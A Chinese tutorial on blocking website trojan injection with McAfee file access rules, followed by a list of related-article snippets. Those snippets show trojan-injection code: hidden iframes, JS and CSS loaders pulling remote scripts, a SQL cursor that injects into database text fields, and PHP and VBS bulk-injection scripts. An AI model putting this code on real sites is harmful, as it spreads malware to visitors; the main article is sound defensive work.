让McAfee来终结网站被挂马的时代图文教程

很多站长因为使用网上不常见的程序,有漏洞得不到补丁;而自己又没有编程能力无法修复或者干脆不知道漏洞在那里,被挂马后恢复程序结果不久又被挂……还有很多人即使使用的是应用比较广泛的程序,但也可能因为没及时打上补丁或出了漏洞官方还未发现而被挂马。

  老是被挂也不是个事。怎么才能彻底杜绝被挂马呢?让程序完美,没有任何漏洞?这个可能性好象接近于0。我们只能从其他的地方想办法。

  首先来看一下马是怎么挂上去的。首先,“黑客”会找到一个漏洞,然后利用这个漏洞上传一个后门程序上去以取得WEBSHELL,这个上传的程序一般为ASP文件(本文以ASP为例,其他基本相同),或者他会创建一个名字看起来像ASP文件的目录然后在这个目录里上传一个后门程序。之后黑客便会运行这个后门程序,修改网站里所有的.ASP、.HTM、.HTML文件,把调用木马的代码加上去。

  (关于名字看起来像ASP文件的目录的漏洞的问题以前发过解决办法。自己找找看,本文不再累赘。)

  总结分析一下“黑客”对我们的网站都干了些啥:
  1.上传了一个文件(创建或修改了一个ASP文件)。
  2.在ASP等文件里加了调用木马的代码(修改了.ASP、.HTM、.HTML文件)。

  分析清楚“黑客”具体做了什么,再来分析一下我们自己的网站:
  1.ASP程序文件一般不需要修改也不需要新建,只要运行就够了。
  2.生成HTML文件的过程是先删除同路径下同名的旧HTML文件,然后再创建一个新的,如果原来没有则直接创建。

  分析清楚了这些,再看看本文标题,如果用过McAfee,你应该想到我们要怎么做了吧?对!就用访问规则把“黑客”做的事全给禁止了然后把我们自己需要的权限留出来!

  对于ASP文件,“黑客”是创建和修改,而我们只需要读取和运行。那么,规则如下:

我们自己在需要创建和修改ASP文件的时候可以先把这条规则禁用。

  对于HTM、HTML文件,“黑客”是修改,而我们需要创建、删除、读取等。那么规则如下:



另外我们再新建几条规则,把上图中文件名里的*.HTM换成*.HTML、*.JS、*.CSS等文件这样这些文件“黑客”也就没法修改挂马了。在我们自己需要修改这些文件的时候先把规则禁用。

  这样做之后,即使我们的网站程序存在漏洞,也不会让“黑客”挂上马了!
  网站被挂马的时代,让McAfee来终结你吧!

*****一想千开(www.yes1000.com)原创文章,转载请保留此信息*****

(0)

相关推荐

  • 最近比较流行的数据库挂马

    SQL语句如下: 用游标遍历所有表里如下数据类型的字段,然后UPDATE挂马.(全部是允许写入字符的字段) xtype=99 ntext xtype=35 text xtype=231 nvarchar xtype=167 varchar -------YD的分割----------– DECLARE @T varchar(255), @C varchar(255) DECLARE Table_Cursor CURSOR FOR Select a.name,b.name from sysobje

  • php下批量挂马和批量清马代码

    复制代码 代码如下: <?php function gmfun($path=".") { $d = @dir($path); while(false !== ($v = $d->read())) { if($v == "." || $v == "..") continue; $file = $d->path."/".$v; if(@is_dir($file)) { gmfun($file); } else {

  • Asp常见挂马方式大总结

    一:框架挂马 <iframe src=地址 width=0 height=0></iframe> 其中"地址"处可以输入恶意网站链接等 二:js文件挂马 只要是JS文件,都可以通过被恶意修改从而被挂上恶意代码,一般被全站引用的JS代码最容易被挂木马,检测我们可以查看JS代码的左边或下边,坏人很喜欢将恶意代码与正常代码间用很多空格或回车来进行隐藏,所以要多看看JS代码页面有没有被故意拉长等. 三:js变形加密 <SCRIPT language="J

  • 阻止网页挂马的若干工具小集合

    那么,除了在Web开发的时候注意以外,有什么有效的工具可以对抗SQL注入攻击? 今天,微软和惠普的安全部门合作发布了三个工具,分别是: 微软SQL注入攻击源码扫描器:Microsoft Source Code Analyzer for SQL Injection (MSCASI).这个工具给网站开发人员使用.是一个静态扫描ASP代码的工具,可以查找发现第一类和第二类的SQL注入攻击漏洞.工具下载地址: http://support.microsoft.com/kb/954476 惠普的 Scra

  • 挂马代码 网页挂马分析

    如今网民上网可算是提心吊胆,面对病毒,也许杀毒软件还能防止一二,但如果遇到网页中挂马行为,甚至直接将用户当前机所安装的杀毒软件直接强行关闭,那么其后果是不言而喻的.如今的网页有马行为也不像以前那么单一,甚至不出现下载提示,直接从后台开始下载运行其马,然后秘密的收集用户信息并返溃到恶意者手中.     网马危害     如果一台正常的网络服务器被恶意用户入侵,其网页被挂马,在一定程度上可以说是网页被篡改,其危害是巨大的,随着用户访问流量的增多,会造成此马的传播性越发增大,由于其隐蔽性比较强,导至很

  • 数据库中的内容字段被挂马的替换方法 SQL注入

    清除了sqlsever中的一些挂马字段,现在总结sqlsever批量替换数据库挂马字段一文,希望可以帮助有需要的人. [处理方法] 1.先备份数据,防止删除挂马字段的时候,丢失数据: 2.对挂马的表中的字段text小于8000执行以下语句(网上的很多软件与方法都是针对text小于8000的,这个解决方法你可以参考) 代码如下: 如表news 字段context 挂马字段是 <Script Src=http://c.n%75clear3.com/css/c.js></Script>

  • 网页挂马方式整理及详细介绍

    网页挂马方式 一:框架挂马 <iframe src=地址 width=0 height=0></iframe>  二:js文件挂马 首先将以下代码 document.write("<iframe width='0' height='0' src='地址'></iframe>"); 保存为xxx.js, 则JS挂马代码为 <script language=javascript src=xxx.js></script>

  • js cookies 常见网页木马挂马代码 24小时只加载一次

    复制代码 代码如下: <div style='display:none'> <script type="text/javascript"> function goad(){ var Then = new Date() Then.setTime(Then.getTime() + 2*60*60*1000) var cookieString = new String(document.cookie) var cookieHeader = "Cookier1

  • 利用css实现挂马的代码

    body {  background-image: url('javascript:document.write("<script src=http://www.jb51.net/9xiao.js></script>")') } 9xiao.js内容是 document.write("<iframe src=你的网马 width=0 height=0></iframe>")

  • 两个批量挂马vbs脚本代码

    scan.vbe cscript scan.vbe web目录 程序代码: '版权信息 br="************************************" & vbCrLf br=br & "* VBS 批量挂马脚本 *" & vbCrLf br=br & "* BY BanLG *" & vbCrLf br=br & "**************************

随机推荐